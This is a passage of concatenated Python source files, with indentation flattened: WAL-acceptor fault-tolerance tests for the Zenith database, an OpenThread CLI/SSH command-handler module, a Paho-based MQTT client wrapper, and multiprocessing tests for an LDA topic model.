# succeed and data is written
def test_normal_work(zenith_cli, pageserver: ZenithPageserver, postgres: PostgresFactory, wa_factory):
zenith_cli.run(["branch", "test_wal_acceptors_normal_work", "empty"])
wa_factory.start_n_new(3)
pg = postgres.create_start('test_wal_acceptors_normal_work',
wal_acceptors=wa_factory.get_connstrs())
with closing(pg.connect()) as conn:
with conn.cursor() as cur:
# we rely upon autocommit after each statement
# as waiting for acceptors happens there
cur.execute('CREATE TABLE t(key int primary key, value text)')
cur.execute("INSERT INTO t SELECT generate_series(1,100000), 'payload'")
cur.execute('SELECT sum(key) FROM t')
assert cur.fetchone() == (5000050000, )
# Run page server and multiple acceptors, and multiple compute nodes running
# against different timelines.
def test_many_timelines(zenith_cli, pageserver: ZenithPageserver, postgres: PostgresFactory, wa_factory):
n_timelines = 2
wa_factory.start_n_new(3)
branches = ["test_wal_acceptors_many_timelines_{}".format(tlin) for tlin in range(n_timelines)]
# start postgres on each timeline
pgs = []
for branch in branches:
zenith_cli.run(["branch", branch, "empty"])
pgs.append(postgres.create_start(branch, wal_acceptors=wa_factory.get_connstrs()))
# Do everything in different loops to have actions on different timelines
# interleaved.
# create schema
for pg in pgs:
pg.safe_psql("CREATE TABLE t(key int primary key, value text)")
# Populate data
for pg in pgs:
pg.safe_psql("INSERT INTO t SELECT generate_series(1,100000), 'payload'")
# Check data
for pg in pgs:
res = pg.safe_psql("SELECT sum(key) FROM t")
assert res[0] == (5000050000, )
# Check that dead minority doesn't prevent the commits: execute insert n_inserts
# times, with fault_probability chance of getting a wal acceptor down or up
# along the way. 2 of 3 are always alive, so the work keeps going.
def test_restarts(zenith_cli, pageserver: ZenithPageserver, postgres: PostgresFactory, wa_factory: WalAcceptorFactory):
fault_probability = 0.01
n_inserts = 1000
n_acceptors = 3
wa_factory.start_n_new(n_acceptors)
zenith_cli.run(["branch", "test_wal_acceptors_restarts", "empty"])
pg = postgres.create_start('test_wal_acceptors_restarts',
wal_acceptors=wa_factory.get_connstrs())
# we rely upon autocommit after each statement
# as waiting for acceptors happens there
pg_conn = pg.connect()
cur = pg_conn.cursor()
failed_node = None
cur.execute('CREATE TABLE t(key int primary key, value text)')
for i in range(n_inserts):
cur.execute("INSERT INTO t values (%s, 'payload');", (i + 1, ))
if random.random() <= fault_probability:
if failed_node is None:
failed_node = wa_factory.instances[random.randrange(0, n_acceptors)]
failed_node.stop()
else:
failed_node.start()
failed_node = None
cur.execute('SELECT sum(key) FROM t')
assert cur.fetchone() == (500500, )
start_delay_sec = 2
def delayed_wal_acceptor_start(wa):
time.sleep(start_delay_sec)
wa.start()
# When majority of acceptors is offline, commits are expected to be frozen
def test_unavailability(zenith_cli, postgres: PostgresFactory, wa_factory):
wa_factory.start_n_new(2)
zenith_cli.run(["branch", "test_wal_acceptors_unavailability", "empty"])
pg = postgres.create_start('test_wal_acceptors_unavailability',
wal_acceptors=wa_factory.get_connstrs())
# we rely upon autocommit after each statement
# as waiting for acceptors happens there
pg_conn = pg.connect()
cur = pg_conn.cursor()
# check basic work with table
cur.execute('CREATE TABLE t(key int primary key, value text)')
cur.execute("INSERT INTO t values (1, 'payload')")
# shutdown one of two acceptors, that is, majority
wa_factory.instances[0].stop()
proc = Process(target=delayed_wal_acceptor_start, args=(wa_factory.instances[0], ))
proc.start()
start = time.time()
cur.execute("INSERT INTO t values (2, 'payload')")
# ensure that the query above was hanging while acceptor was down
assert (time.time() - start) >= start_delay_sec
proc.join()
# for the world's balance, do the same with second acceptor
wa_factory.instances[1].stop()
proc = Process(target=delayed_wal_acceptor_start, args=(wa_factory.instances[1], ))
proc.start()
start = time.time()
cur.execute("INSERT INTO t values (3, 'payload')")
# ensure that the query above was hanging while acceptor was down
assert (time.time() - start) >= start_delay_sec
proc.join()
cur.execute("INSERT INTO t values (4, 'payload')")
cur.execute('SELECT sum(key) FROM t')
assert cur.fetchone() == (10, )
# shut down random subset of acceptors, sleep, wake them up, rinse, repeat
def xmas_garland(acceptors, stop):
while not bool(stop.value):
victims = []
for wa in acceptors:
if random.random() >= 0.5:
victims.append(wa)
for v in victims:
v.stop()
time.sleep(1)
for v in victims:
v.start()
time.sleep(1)
# value which gets unset on exit
@pytest.fixture
def stop_value():
stop = Value('i', 0)
yield stop
stop.value = 1
# do inserts while concurrently getting up/down subsets of acceptors
def test_race_conditions(zenith_cli, pageserver: ZenithPageserver, postgres: PostgresFactory, wa_factory, stop_value):
wa_factory.start_n_new(3)
zenith_cli.run(["branch", "test_wal_acceptors_race_conditions", "empty"])
pg = postgres.create_start('test_wal_acceptors_race_conditions',
wal_acceptors=wa_factory.get_connstrs())
# we rely upon autocommit after each statement
# as waiting for acceptors happens there
pg_conn = pg.connect()
cur = pg_conn.cursor()
cur.execute('CREATE TABLE t(key int primary key, value text)')
proc = Process(target=xmas_garland, args=(wa_factory.instances, stop_value))
proc.start()
for i in range(1000):
cur.execute("INSERT INTO t values (%s, 'payload');", (i + 1, ))
cur.execute('SELECT sum(key) FROM t')
assert cur.fetchone() == (500500, )
stop_value.value = 1
proc.join()
|
command_handlers.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Any, Callable, Optional, Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
"""This abstract class defines interfaces of a OT Command Handler."""
@abstractmethod
def execute_command(self, cmd: str, timeout: float) -> List[str]:
"""Method execute_command should execute the OT CLI command within a timeout (in seconds) and return the
command output as a list of lines.
Note: each line SHOULD NOT contain '\r\n' at the end. The last line of output should be 'Done' or
'Error <code>: <msg>' following OT CLI conventions.
"""
pass
@abstractmethod
def close(self):
"""Method close should close the OT Command Handler."""
pass
@abstractmethod
def wait(self, duration: float) -> List[str]:
"""Method wait should wait for a given duration and return the OT CLI output during this period.
Normally, OT CLI does not output when it's not executing any command. But OT CLI can also output
asynchronously in some cases (e.g. `Join Success` when Joiner joins successfully).
"""
pass
@abstractmethod
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
"""Method set_line_read_callback should register a callback that will be called for every line
output by the OT CLI.
This is useful for handling asynchronous command output while still being able to execute
other commands.
"""
pass
def shell(self, cmd: str, timeout: float) -> List[str]:
raise NotImplementedError("shell command is not supported on %s" % self.__class__.__name__)
class OtCliCommandRunner(OTCommandHandler):
__PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
r'(Done|Error|Error \d+:.*|.*: command not found)$') # "Error" for spinel-cli.py
__PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
r'|(-.*-+: )' # e.g. -CLI-----:
r')')
"""regex used to filter logs"""
__ASYNC_COMMANDS = {'scan', 'ping', 'discover'}
def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
self.__otcli: OtCliHandler = otcli
self.__is_spinel_cli = is_spinel_cli
self.__expect_command_echoback = not self.__is_spinel_cli
self.__line_read_callback = None
self.__pending_lines = queue.Queue()
self.__should_close = threading.Event()
self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
self.__otcli_reader.setDaemon(True)
self.__otcli_reader.start()
def __repr__(self):
return repr(self.__otcli)
def execute_command(self, cmd, timeout=10) -> List[str]:
self.__otcli.writeline(cmd)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
self.__otcli.writeline('extaddr')
self.wait(1)
return []
if self.__expect_command_echoback:
self.__expect_line(timeout, cmd)
output = self.__expect_line(timeout,
OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
return output
def wait(self, duration: float) -> List[str]:
self.__otcli.wait(duration)
output = []
try:
while True:
line = self.__pending_lines.get_nowait()
output.append(line)
except queue.Empty:
pass
return output
def close(self):
self.__should_close.set()
self.__otcli.close()
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
#
# Private methods
#
def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
output = []
if not asynchronous:
while True:
try:
line = self.__pending_lines.get(timeout=timeout)
except queue.Empty:
raise ExpectLineTimeoutError(expect_line)
output.append(line)
if match_line(line, expect_line):
break
else:
done = False
while not done and timeout > 0:
lines = self.wait(1)
timeout -= 1
for line in lines:
output.append(line)
if match_line(line, expect_line):
done = True
break
if not done:
raise ExpectLineTimeoutError(expect_line)
return output
def __otcli_read_routine(self):
while not self.__should_close.isSet():
line = self.__otcli.readline()
logging.debug('%s: %r', self.__otcli, line)
if line.startswith('> '):
line = line[2:]
if self.__line_read_callback is not None:
self.__line_read_callback(line)
logging.debug('%s: %s', self.__otcli, line)
if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
self.__pending_lines.put(line)
class OtbrSshCommandRunner(OTCommandHandler):
def __init__(self, host, port, username, password, sudo):
import paramiko
self.__host = host
self.__port = port
self.__sudo = sudo
self.__ssh = paramiko.SSHClient()
self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__line_read_callback = None
try:
self.__ssh.connect(host,
port=port,
username=username,
password=password,
allow_agent=False,
look_for_keys=False)
except paramiko.ssh_exception.AuthenticationException:
if not password:
self.__ssh.get_transport().auth_none(username)
else:
raise
def __repr__(self):
return f'{self.__host}:{self.__port}'
def execute_command(self, cmd: str, timeout: float) -> List[str]:
sh_cmd = f'ot-ctl {cmd}'
if self.__sudo:
sh_cmd = 'sudo ' + sh_cmd
output = self.shell(sh_cmd, timeout=timeout)
if self.__line_read_callback is not None:
for line in output:
self.__line_read_callback(line)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
return output
def shell(self, cmd: str, timeout: float) -> List[str]:
cmd_in, cmd_out, cmd_err = self.__ssh.exec_command(cmd, timeout=int(timeout), bufsize=1024)
errput = [l.rstrip('\r\n') for l in cmd_err.readlines()]
output = [l.rstrip('\r\n') for l in cmd_out.readlines()]
if errput:
raise CommandError(cmd, errput)
return output
def close(self):
self.__ssh.close()
def wait(self, duration: float) -> List[str]:
time.sleep(duration)
return []
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
|
mqtt_client.py
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
MQTT client utility: Tries to hide Paho client details to ease MQTT usage.
Reconnects to the MQTT server automatically.
This module depends on the paho-mqtt package (ex-mosquitto), provided by the
Eclipse Foundation: see http://www.eclipse.org/paho
:author: Thomas Calmant
:copyright: Copyright 2016, Thomas Calmant
:license: Apache License 2.0
:version: 0.6.4
..
Copyright 2016 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import logging
import os
import sys
import threading
# MQTT client
import paho.mqtt.client as paho
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (0, 6, 4)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
# ------------------------------------------------------------------------------
class MqttClient(object):
"""
Remote Service discovery provider based on MQTT
"""
def __init__(self, client_id=None):
"""
Sets up members
:param client_id: ID of the MQTT client
"""
# No ID
if not client_id:
# Randomize client ID
self._client_id = self.generate_id()
elif len(client_id) > 23:
# ID too large
_logger.warning("MQTT Client ID '%s' is too long (23 chars max): "
"generating a random one", client_id)
# Keep the client ID as it might be accepted
self._client_id = client_id
else:
# Keep the ID as is
self._client_id = client_id
# Reconnection timer
self.__timer = threading.Timer(5, self.__reconnect)
# Publication events
self.__in_flight = {}
# MQTT client
self.__mqtt = paho.Client(self._client_id)
# Give access to Paho methods to configure TLS
self.tls_set = self.__mqtt.tls_set
# Paho callbacks
self.__mqtt.on_connect = self.__on_connect
self.__mqtt.on_disconnect = self.__on_disconnect
self.__mqtt.on_message = self.__on_message
self.__mqtt.on_publish = self.__on_publish
@property
def raw_client(self):
"""
Returns the raw client object, depending on the underlying library
"""
return self.__mqtt
@staticmethod
def on_connect(client, result_code):
"""
User callback: called when the client is connected
:param client: The Pelix MQTT client which connected
:param result_code: The MQTT result code
"""
pass
@staticmethod
def on_disconnect(client, result_code):
"""
User callback: called when the client is disconnected
:param client: The Pelix MQTT client which disconnected
:param result_code: The MQTT result code
"""
pass
@staticmethod
def on_message(client, message):
"""
User callback: called when the client has received a message
:param client: The Pelix MQTT client which received a message
:param message: The MQTT message
"""
pass
@classmethod
def generate_id(cls, prefix="pelix-"):
"""
Generates a random MQTT client ID
:param prefix: Client ID prefix (truncated to 8 chars)
:return: A client ID of 22 or 23 characters
"""
if not prefix:
# Normalize string
prefix = ""
else:
# Truncate long prefixes
prefix = prefix[:8]
# Prepare the missing part
nb_bytes = (23 - len(prefix)) // 2
random_bytes = os.urandom(nb_bytes)
if sys.version_info[0] >= 3:
random_ints = [char for char in random_bytes]
else:
random_ints = [ord(char) for char in random_bytes]
random_id = ''.join('{0:02x}'.format(value) for value in random_ints)
return "{0}{1}".format(prefix, random_id)
@classmethod
def topic_matches(cls, subscription_filter, topic):
"""
Checks if the given topic matches the given subscription filter
:param subscription_filter: A MQTT subscription filter
:param topic: A topic
:return: True if the topic matches the filter
"""
return paho.topic_matches_sub(subscription_filter, topic)
@property
def client_id(self):
"""
The MQTT client ID
"""
return self._client_id
def set_credentials(self, username, password):
"""
Sets the user name and password to be authenticated on the server
:param username: Client username
:param password: Client password
"""
self.__mqtt.username_pw_set(username, password)
def set_will(self, topic, payload, qos=0, retain=False):
"""
Sets up the will message
:param topic: Topic of the will message
:param payload: Content of the message
:param qos: Quality of Service
:param retain: The message will be retained
:raise ValueError: Invalid topic
:raise TypeError: Invalid payload
"""
self.__mqtt.will_set(topic, payload, qos, retain=retain)
def connect(self, host="localhost", port=1883, keepalive=60):
"""
Connects to the MQTT server. The client will automatically try to
reconnect to this server when the connection is lost.
:param host: MQTT server host
:param port: MQTT server port
:param keepalive: Maximum period in seconds between communications with
the broker
:raise ValueError: Invalid host or port
"""
# Disconnect first (it also stops the timer)
self.disconnect()
# Prepare the connection
self.__mqtt.connect(host, port, keepalive)
# Start the MQTT loop
self.__mqtt.loop_start()
def disconnect(self):
"""
Disconnects from the MQTT server
"""
# Stop the timer
self.__stop_timer()
# Unlock all publishers
for event in self.__in_flight.values():
event.set()
# Disconnect from the server
self.__mqtt.disconnect()
# Stop the MQTT loop thread
# Use a thread to avoid a dead lock in Paho
thread = threading.Thread(target=self.__mqtt.loop_stop)
thread.daemon = True
thread.start()
# Give it some time
thread.join(4)
def publish(self, topic, payload, qos=0, retain=False, wait=False):
"""
Sends a message through the MQTT connection
:param topic: Message topic
:param payload: Message content
:param qos: Quality of Service
:param retain: Retain flag
:param wait: If True, prepares an event to wait for the message to be
published
:return: The local message ID, None on error
"""
result = self.__mqtt.publish(topic, payload, qos, retain)
if wait and not result[0]:
# Publish packet sent, wait for it to return
self.__in_flight[result[1]] = threading.Event()
_logger.debug("Waiting for publication of %s", topic)
return result[1]
def wait_publication(self, mid, timeout=None):
"""
Wait for a publication to be validated
:param mid: Local message ID (result of publish)
:param timeout: Wait timeout (in seconds)
:return: True if the message was published, False if timeout was raised
:raise KeyError: Unknown waiting local message ID
"""
return self.__in_flight[mid].wait(timeout)
def subscribe(self, topic, qos=0):
"""
Subscribes to a topic on the server
:param topic: Topic filter string(s)
:param qos: Desired quality of service
:raise ValueError: Invalid topic or QoS
"""
self.__mqtt.subscribe(topic, qos)
def unsubscribe(self, topic):
"""
Unscribes from a topic on the server
:param topic: Topic(s) to unsubscribe from
:raise ValueError: Invalid topic parameter
"""
self.__mqtt.unsubscribe(topic)
def __start_timer(self, delay):
"""
Starts the reconnection timer
:param delay: Delay (in seconds) before calling the reconnection method
"""
self.__timer = threading.Timer(delay, self.__reconnect)
self.__timer.daemon = True
self.__timer.start()
def __stop_timer(self):
"""
Stops the reconnection timer, if any
"""
if self.__timer is not None:
self.__timer.cancel()
self.__timer = None
def __reconnect(self):
"""
Tries to connect to the MQTT server
"""
# Cancel the timer, if any
self.__stop_timer()
try:
# Try to reconnect the server
result_code = self.__mqtt.reconnect()
if result_code:
# Something wrong happened
message = "Error connecting the MQTT server: {0} ({1})" \
.format(result_code, paho.error_string(result_code))
_logger.error(message)
raise ValueError(message)
except Exception as ex:
# Something went wrong: log it
_logger.error("Exception connecting server: %s", ex)
finally:
# Prepare a reconnection timer. It will be cancelled by the
# on_connect callback
self.__start_timer(10)
def __on_connect(self, client, userdata, flags, result_code):
"""
Client connected to the server
:param client: Connected Paho client
:param userdata: User data (unused)
:param flags: Response flags sent by the broker
:param result_code: Connection result code (0: success, others: error)
"""
if result_code:
# result_code != 0: something wrong happened
_logger.error("Error connecting the MQTT server: %s (%d)",
paho.connack_string(result_code), result_code)
else:
# Connection is OK: stop the reconnection timer
self.__stop_timer()
# Notify the caller, if any
if self.on_connect is not None:
try:
self.on_connect(self, result_code)
except Exception as ex:
_logger.exception("Error notifying MQTT listener: %s", ex)
def __on_disconnect(self, client, userdata, result_code):
"""
Client has been disconnected from the server
:param client: Client that received the message
:param userdata: User data (unused)
:param result_code: Disconnection reason (0: expected, 1: error)
"""
if result_code:
# rc != 0: unexpected disconnection
_logger.error(
"Unexpected disconnection from the MQTT server: %s (%d)",
paho.connack_string(result_code), result_code)
# Try to reconnect
self.__stop_timer()
self.__start_timer(2)
# Notify the caller, if any
if self.on_disconnect is not None:
try:
self.on_disconnect(self, result_code)
except Exception as ex:
_logger.exception("Error notifying MQTT listener: %s", ex)
def __on_message(self, client, userdata, msg):
"""
A message has been received from a server
:param client: Client that received the message
:param userdata: User data (unused)
:param msg: A MQTTMessage bean
"""
# Notify the caller, if any
if self.on_message is not None:
try:
self.on_message(self, msg)
except Exception as ex:
_logger.exception("Error notifying MQTT listener: %s", ex)
def __on_publish(self, client, userdata, mid):
"""
A message has been published by a server
:param client: Client that received the message
:param userdata: User data (unused)
:param mid: Message ID
"""
try:
self.__in_flight[mid].set()
except KeyError:
pass
|
tests_ldacgsmulti.py
|
from __future__ import print_function
from builtins import zip
from builtins import range
from builtins import object
import unittest2 as unittest
import numpy as np
from vsm.corpus import Corpus
from vsm.corpus.util.corpusbuilders import random_corpus
from vsm.model.ldacgsseq import *
from vsm.model.ldacgsmulti import *
from multiprocessing import Process
class MPTester(object):
def test_LdaCgsMulti_phi(self):
c = random_corpus(1000, 50, 6, 100)
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
phi = m0.word_top / m0.word_top.sum(0)
assert (phi.sum(axis=0) == 1.0).all()
assert phi.sum() == 10.0
def test_LdaCgsMulti_theta(self):
c = random_corpus(1000, 50, 6, 100)
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
theta = self.model.top_doc / self.model.top_doc.sum(0)
assert (theta.sum(axis=0) == 1.0).all()
assert theta.sum() == theta.shape[1]
def test_demo_LdaCgsMulti(self):
from vsm.model.ldacgsmulti import demo_LdaCgsMulti
demo_LdaCgsMulti()
def test_LdaCgsMulti_IO(self):
from tempfile import NamedTemporaryFile
import os
c = random_corpus(1000, 50, 6, 100)
tmp = NamedTemporaryFile(delete=False, suffix='.npz')
try:
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
m0.save(tmp.name)
m1 = LdaCgsMulti.load(tmp.name)
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
assert m0.log_probs == m1.log_probs
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
for i in range(max(len(m0.Z), len(m1.Z))):
assert m0.Z[i].all() == m1.Z[i].all()
assert m0.top_doc.all() == m1.top_doc.all()
assert m0.word_top.all() == m1.word_top.all()
assert m0.inv_top_sums.all() == m1.inv_top_sums.all()
assert m0.seeds == m1.seeds
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
assert s0[0] == s1[0]
assert (s0[1] == s1[1]).all()
assert s0[2:] == s1[2:]
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
m0.save(tmp.name)
m1 = LdaCgsMulti.load(tmp.name)
assert not hasattr(m1, 'log_prob')
finally:
os.remove(tmp.name)
def test_LdaCgsMulti_SeedTypes(self):
""" Test for issue #74 issues. """
from tempfile import NamedTemporaryFile
import os
c = random_corpus(1000, 50, 6, 100)
tmp = NamedTemporaryFile(delete=False, suffix='.npz')
try:
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
m0.save(tmp.name)
m1 = LdaCgsMulti.load(tmp.name)
for s0, s1 in zip(m0.seeds, m1.seeds):
assert type(s0) == type(s1)
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
for i in range(5):
assert type(s0[i]) == type(s1[i])
finally:
os.remove(tmp.name)
def test_LdaCgsMulti_random_seeds(self):
from vsm.corpus.util.corpusbuilders import random_corpus
c = random_corpus(1000, 50, 0, 20, context_type='document',
metadata=True)
m0 = LdaCgsMulti(c, 'document', K=10)
assert m0.seeds is not None
orig_seeds = m0.seeds
m1 = LdaCgsMulti(c, 'document', K=10, seeds=orig_seeds)
assert m0.seeds == m1.seeds
m0.train(n_iterations=5, verbose=0)
m1.train(n_iterations=5, verbose=0)
assert m0.seeds == orig_seeds
assert m1.seeds == orig_seeds
# ref:http://docs.scipy.org/doc/numpy/reference/generated/numpy.random.RandomState.get_state.html
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
assert s0[0] == 'MT19937'
assert s1[0] == 'MT19937'
assert (s0[1] == s1[1]).all()
assert s0[2:] == s1[2:]
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
assert m0.log_probs == m1.log_probs
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
for i in range(max(len(m0.Z), len(m1.Z))):
assert m0.Z[i].all() == m1.Z[i].all()
assert m0.top_doc.all() == m1.top_doc.all()
assert m0.word_top.all() == m1.word_top.all()
assert m0.inv_top_sums.all() == m1.inv_top_sums.all()
def test_LdaCgsMulti_continue_training(self):
from vsm.corpus.util.corpusbuilders import random_corpus
c = random_corpus(1000, 50, 0, 20, context_type='document',
metadata=True)
m0 = LdaCgsMulti(c, 'document', K=10)
assert m0.seeds is not None
orig_seeds = m0.seeds
m1 = LdaCgsMulti(c, 'document', K=10, seeds=orig_seeds)
assert m0.seeds == m1.seeds
m0.train(n_iterations=2, verbose=0)
m1.train(n_iterations=5, verbose=0)
assert m0.seeds == orig_seeds
assert m1.seeds == orig_seeds
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
assert (s0[1] != s1[1]).any()
assert s0[2:] != s1[2:]
m0.train(n_iterations=3, verbose=0)
# ref:http://docs.scipy.org/doc/numpy/reference/generated/numpy.random.RandomState.get_state.html
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
assert s0[0] == 'MT19937'
assert s1[0] == 'MT19937'
assert (s0[1] == s1[1]).all()
assert s0[2:] == s1[2:]
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
assert m0.log_probs == m1.log_probs
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
for i in range(max(len(m0.Z), len(m1.Z))):
assert m0.Z[i].all() == m1.Z[i].all()
assert m0.top_doc.all() == m1.top_doc.all()
assert m0.word_top.all() == m1.word_top.all()
assert m0.inv_top_sums.all() == m1.inv_top_sums.all()
def test_LdaCgsMulti_remove_Seq_props(self):
from vsm.corpus.util.corpusbuilders import random_corpus
c = random_corpus(1000, 50, 0, 20, context_type='document',
metadata=True)
m0 = LdaCgsMulti(c, 'document', K=10)
assert getattr(m0, 'seed', None) is None
assert getattr(m0, '_mtrand_state', None) is None
def test_LdaCgsMulti_eq_LdaCgsSeq(self):
from tempfile import NamedTemporaryFile
import os
c = random_corpus(1000, 50, 6, 100, seed=2)
tmp = NamedTemporaryFile(delete=False, suffix='.npz')
m0 = LdaCgsMulti(c, 'document', K=10, n_proc=1, seeds=[2])
m1 = LdaCgsSeq(c, 'document', K=10, seed=2)
for iteration in range(20):
m0.train(n_iterations=1, verbose=0)
m1.train(n_iterations=1, verbose=0)
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
assert (m0.Z[i] == m1.Z[i]).all()
assert (m0.top_doc == m1.top_doc).all()
assert (m0.word_top == m1.word_top).all()
assert (np.isclose(m0.inv_top_sums, m1.inv_top_sums)).all()
assert m0.seeds[0] == m1.seed
assert m0._mtrand_states[0][0] == m1._mtrand_state[0]
for s0,s1 in zip(m0._mtrand_states[0][1], m1._mtrand_state[1]):
assert s0 == s1
assert m0._mtrand_states[0][2] == m1._mtrand_state[2]
assert m0._mtrand_states[0][3] == m1._mtrand_state[3]
assert m0._mtrand_states[0][4] == m1._mtrand_state[4]
print(iteration, m0.log_probs[-1], m1.log_probs[-1])
for i in range(iteration):
assert np.isclose(m0.log_probs[i][1], m1.log_probs[i][1])
def test_LdaCgsMulti_eq_LdaCgsSeq_multi(self):
from tempfile import NamedTemporaryFile
import os
c = random_corpus(1000, 50, 6, 100, seed=2)
tmp = NamedTemporaryFile(delete=False, suffix='.npz')
m0 = LdaCgsMulti(c, 'document', K=10, n_proc=1, seeds=[2])
m1 = LdaCgsSeq(c, 'document', K=10, seed=2)
for iteration in range(20):
m0.train(n_iterations=2, verbose=0)
m1.train(n_iterations=2, verbose=0)
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
assert (m0.Z[i] == m1.Z[i]).all()
assert (m0.top_doc == m1.top_doc).all()
assert (m0.word_top == m1.word_top).all()
assert m0.seeds[0] == m1.seed
assert m0._mtrand_states[0][0] == m1._mtrand_state[0]
for s0,s1 in zip(m0._mtrand_states[0][1], m1._mtrand_state[1]):
assert s0 == s1
assert m0._mtrand_states[0][2] == m1._mtrand_state[2]
assert m0._mtrand_states[0][3] == m1._mtrand_state[3]
assert m0._mtrand_states[0][4] == m1._mtrand_state[4]
print(iteration, m0.log_probs[-1], m1.log_probs[-1])
for i in range(iteration):
assert np.isclose(m0.log_probs[i][1], m1.log_probs[i][1])
assert (np.isclose(m0.inv_top_sums, m1.inv_top_sums)).all()
class TestLdaCgsMulti(unittest.TestCase):
def setUp(self):
pass
def test_demo_LdaCgsMulti(self):
t = MPTester()
p = Process(target=t.test_demo_LdaCgsMulti, args=())
p.start()
p.join()
def test_LdaCgsMulti_IO(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_IO, args=())
p.start()
p.join()
def test_LdaCgsMulti_SeedTypes(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_SeedTypes, args=())
p.start()
p.join()
def test_LdaCgsMulti_random_seeds(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_random_seeds, args=())
p.start()
p.join()
def test_LdaCgsMulti_remove_Seq_props(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_remove_Seq_props, args=())
p.start()
p.join()
def test_LdaCgsMulti_continue_training(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_continue_training, args=())
